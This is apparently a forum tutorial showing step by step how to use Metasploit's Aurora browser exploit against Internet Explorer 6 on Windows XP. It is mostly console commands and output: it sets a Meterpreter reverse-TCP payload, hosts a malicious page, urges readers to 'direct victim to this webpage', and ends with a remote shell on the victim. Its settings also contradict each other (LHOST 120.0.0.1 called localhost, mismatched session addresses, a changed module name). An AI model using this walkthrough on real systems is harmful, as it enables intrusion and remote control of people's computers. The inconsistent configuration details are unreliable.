In this tutorial we’ll be learning how to perform a basic client side exploitation using Metasploit. Note this tutorial is made for educational purposes only to help you understand how the exploit's can be exploited. Client Side Attacks Client side attacks are special types of attacks that mainly target Client Side Applications, eg : Web Browser , Download Client etc. These are Different from Server Side Applications as instead of targeting vulnerabilities in Server Side applications like : Web Server etc. It actually targets the client side application. For demonstrating this attack we’ll be using the Metasploit Framework and Using one of its basic Client Side Exploit. Lab Setup The Lab Consists of a Victim and an Attacker Machine. Code: +++++++++++++++++++ +++++++++++++++++++++ + Attacker + ================ + Victim Machine + + + Behind NAT + + +++++++++++++++++++ +++++++++++++++++++++ Victim The Victim Machine is running an Unlatched Windows XP SP1 machine; With Internet Explorer 6 Which is vulnerable to a Client Side Vulnerability. Attacker The Attacker’s Machine is running Backtrack 5 with Metasploit Installed. I am using Virtual Machines to Setup my Lab, and the Network Type is set to NAT. Now that we have setup our lab let the hacking begin. Exploitation First lets open up Metasploit Console , using ‘msfconsole’ :- Code: root@bt:~# msfconsole __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ \/ \/ |__| =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 688 exploits - 357 auxiliary - 39 post + -- --=[ 217 payloads - 27 encoders - 8 nops msf > Though Metasploit provides hundreds of exploits to exploit Internet Explorer 6, for this tutorial we’ll be using the Internet Explorer Aurora Exploit. To use this exploit in Metasploit simple use the ‘use’ command:- Code: msf > use exploit/windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > Now let’s have a look at the options:- Code: msf exploit(ms10_002_aurora) > show options Module options (exploit/windows/browser/ms10_002_aurora): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Automatic Now let’s set them! Code: msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1 SRVHOST => 127.0.0.1 msf exploit(ms10_002_aurora) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_002_aurora) > set URIPATH / URIPATH => / msf exploit(ms10_002_aurora) > Above we set the Server to localhost i.e 127.0.0.1 , Server port to 80 and the URI path to ‘/’ (ROOT). Now let’s Set some Payload Options:- Code: msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > show options Module options (exploit/windows/browser/ms10_002_aurora): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 127.0.0.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms10_002_aurora) > set LHOST 120.0.0.1 LHOST => 120.0.0.1 msf exploit(ms10_002_aurora) > set LPORT 31337 LPORT => 31337 msf exploit(ms10_002_aurora) > Above we set the Payload to reverse_tcp , the listening server to localhost and the listening Port to 31337. Now that all is setup, let’s launch the exploit:- Code: msf exploit(ms10_002_aurora) > exploit Exploit running as background job. Started reverse handler on 127.0.0.1:31337 Using URL: http://127.0.0.1:80/ Server started. The malicious web page is sitting on our server (URL: http://127.0.0.1:80/) , Now all you have to do is direct victim to this webpage and if they are running an exploitable version on Windows XP they’ll get owned! In this case I’ll use vulnerable IE browser on the Victim Machine to view this site , Now see what happens:- Code: Sending stage (723456 bytes) Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514) msf exploit(ie_aurora) > [B]sessions -i 1[/B] Starting interaction with 1... meterpreter > [B]getuid[/B] Server username: WINXP\VICTIM We got a meterpreter session. Now you can use this to execute any command on the system. Thus the victim machine got owned. That’s all for this tutorial stay tuned for more.
